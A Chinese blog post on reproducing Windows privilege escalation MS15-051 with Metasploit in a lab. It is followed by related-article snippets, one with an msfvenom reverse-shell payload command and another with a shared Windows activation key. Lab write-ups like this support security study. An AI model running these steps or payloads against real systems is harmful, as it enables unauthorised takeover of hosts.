MS15-051(CVE-2015-1701)漏洞复现

最新推荐文章于 2024-06-24 15:27:26 发布
最新推荐文章于 2024-06-24 15:27:26 发布
阅读量1.8k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/115317043
版权

漏洞背景

Win32k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提升漏洞,成功利用此漏洞可使攻击者在内核模式中运行任意代码。攻击者必须具有有效的登录凭证,并且可以本地登录以利用此漏洞。远程或匿名用户无法利用此漏洞。
相应补丁号为:3045171

影响范围

  • Microsoft Windows Vista
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2003
  • Microsoft Windows RT 8.1
  • Microsoft Windows RT
  • Microsoft Windows 8.1
  • Microsoft Windows 8
  • Microsoft Windows 7

漏洞复现

首先获得一个低权限用户的msf,查看一下是否安装了3045171,使用wmic qfe list命令可以查看已安装的所有补丁,也可以用wmic qfe |find "3045171"指定搜索补丁,该靶机并没有安装相应补丁
在这里插入图片描述
使用backgroup命令退出,使用ms15_051模块,设定sessionlhost,直接run就能够得到一个管理员权限的shell
在这里插入图片描述
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS15-051漏洞利用与修复
qq_45716477的博客
07-03 713
文章目录环境 环境 攻击机:Kali 2021.2 IP:192.168.45.135 靶机:Windows7 旗舰版 SP1 IP:192.168.45.134 使用工具: Metasploit | Xampp
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635、MS15-034
热门推荐
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
ms15-051提权
A_dmin的博客
09-14 4136
ms15-051提权 实验概述   Metasploit是一款开源的渗透测试工具,可以帮助安全员发现漏洞问题,此工具带有的攻击模块可以帮助安全员简单的利用相关的漏洞,本实验通过Metasploit对内网机器进行渗透,并且使用ms15-051进行权限提升获取window server 2003的system权限,最后进行远程控制。 实验目的   1、熟练metasploit的使用方法   2、学会m...
MS15-034 CVE-2015-1635 HTTP远程代码执行漏洞漏洞验证)_ms15-034 cve-2015-1635 http远程代码执行漏洞检测
最新发布
m0_60721823的博客
06-24 403
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行漏洞验证DDOS攻击危害严重所以不执行命令进行演示。
MS15-051 修正版Exploit(Webshell可用)
weixin_30734435的博客
01-23 104
MS15-051简介:Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 ...
Microsoft Windows权限提升漏洞(CVE-2015-1701)
weixin_34223655的博客
12-07 550
一个内核特权提升漏洞,如果***者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。***者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 受影响的操作系统版本 Window受影响的操作系统版本Windows Server 2003Windows VistaWindows Server 2008...
MS15-051提权EXP
08-09
MS15-051提权EXP,
MS15-051 修正版Exploit(Webshell可用)-附件资源
03-02
MS15-051 修正版Exploit(Webshell可用)-附件资源
CVE-2015-1635,MS15-034 漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-12 471
靶机环境: Windows Server 2012 R2 IIS 7 下载链接:ed2k://|file|cn_windows_server_2012_x64_dvd_915588.iso|3826081792|6A56281311F9FE6973F66CF36E2F50BE|/ 激活密钥:J7TJK-NQPGQ-Q7VRH-G3B93-2WCQD POC #coding=utf-8 #CVE-2015-1635,MS15-034 import requests def main(target):
Windows Server 2012 R2 Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
友人A的博客
06-17 1298
一、漏洞情况 二、整改记录
web服务器软件漏洞MS15-034&CVE-2017-12615)
kid的博客
07-24 1313
web服务器软件漏洞MS15-034&CVE-2017-12615) 想找找有没有能利用web服务器软件漏洞拿shell的,主要尝试了两个,但实际情况感人…(主要最近去了看雪安全开发者峰会,有大佬讲了最近很火的rdp那个洞,也提到了经典的永恒之蓝,确实这样的的洞很厉害啊,利用溢出直接攻陷主机,但二进制方面确实没有什么学习啊,所以突发奇想,想看看有没有什么利用iis,Apache之类的软件...
ms15-051利用工具
02-04
MS15-051攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。受影响软件windows2003/windows2008/windows2012/windows7/windows8.1
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
MS15-010提权神器
09-24
MS15-010提权神器.shell提权,2015最新提权
Web安全测试中常见逻辑漏洞解析(实战篇)
04-05
通过实战解释在web安全测试中经常会遇到的一些逻辑漏洞
CVE-2015-1635(MS15-034 )
weixin_37879065的博客
04-22 1201
目录环境搭建漏洞复现漏洞修复 环境搭建 漏洞复现 搭建完成后,登录kali攻击机,使用burp抓包,可以看到相应包中有一个Accept-Ranges: bytes字段(断点续传),那么我们可以构造一个HTTP请求包,来检测 构造HTTP请求包,如果返回400,证明不存在这个漏洞,如果返回416(客户端请求的范围无效),则足以证明存在这个漏洞 我们可以使用msf,直接通过此漏洞奖靶机打蓝屏 漏洞修...
Metasploit利用ms15-051漏洞进行权限提权
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-01 3667
Metasploit利用ms15-051漏洞进行权限提权 实验环境 虚拟机:kali-linux(攻击机) 192.168.18.142 window server 2003(靶机) 192.168.18.146 工具:Metasploit 步骤: 1、生成木马文件: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe 2、服务器网站目录上创建个shell
linux 1701权限,Microsoft Windows 本地权限提升漏洞(CVE-2015-1701)(MS15-051)
weixin_29193259的博客
04-30 146
Microsoft Windows 本地权限提升漏洞(CVE-2015-1701)(MS15-051)发布日期:2015-05-12更新日期:2015-05-14受影响系统:Microsoft Windows VistaMicrosoft Windows Server 2012 R2Microsoft Windows Server 2012Microsoft Windows Server 2008...
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP请求来利用该漏洞。 该漏洞的原理是在HTTP.sys驱动程序中存在一个缓冲区溢出漏洞,攻击者可以通过发送特制的HTTP请求来触发该漏洞。当HTTP.sys驱动程序接收到特制的HTTP请求时,它会尝试解析请求头,并将其复制到缓冲区中。但如果请求头中包含了一些特定的数据,就会导致缓冲区溢出,从而使攻击者能够执行任意代码。 为了检测该漏洞,可以使用一些漏洞扫描工具,如Nessus、OpenVAS等。这些工具可以通过发送特制的HTTP请求来检测目标系统是否存在该漏洞。 同时,为了防止该漏洞的利用,可以采取以下措施: 1. 安装Microsoft发布的安全补丁; 2. 禁用WebDAV; 3. 配置网络防火墙,限制HTTP请求的访问权限; 4. 使用WAF(Web应用程序防火墙)等安全设备,对HTTP请求进行过滤和检查。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值